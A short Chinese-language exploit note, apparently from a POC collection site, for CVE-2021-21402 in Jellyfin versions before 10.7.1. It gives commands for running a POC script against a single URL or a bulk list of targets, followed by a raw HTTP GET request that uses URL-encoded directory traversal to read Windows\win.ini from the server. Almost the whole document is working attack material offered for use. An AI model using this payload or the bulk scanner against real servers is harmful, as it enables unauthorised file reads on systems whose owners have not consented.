影响范围

Jellyfin < 10.7.1

POC

#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111

#批量检测
python3 CVE-2021-21402.py -f url.txt

EXP

GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream

results matching ""

No results matching ""